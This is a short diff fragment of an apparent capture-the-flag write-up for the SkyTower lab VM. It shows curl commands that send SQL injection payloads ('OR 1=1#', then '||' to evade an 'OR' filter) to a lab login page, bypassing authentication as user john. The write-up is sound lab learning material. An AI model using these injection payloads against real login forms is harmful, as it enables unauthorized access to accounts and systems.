740i/Writeups/skytower/skytower.md

 curl --data "email=admin&password=' OR 1=1#" http://192.168.56.101/login.php
 There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11#'' at line 1]
 ```
-So we replace the OR with || instead and it works we get logged in as the user john.
+After awhile we replace the OR with || instead and it works we get logged in as the user john.
 ```
 curl --data "email=admin&password=' || 1=1#" http://192.168.56.101/login.php
 ```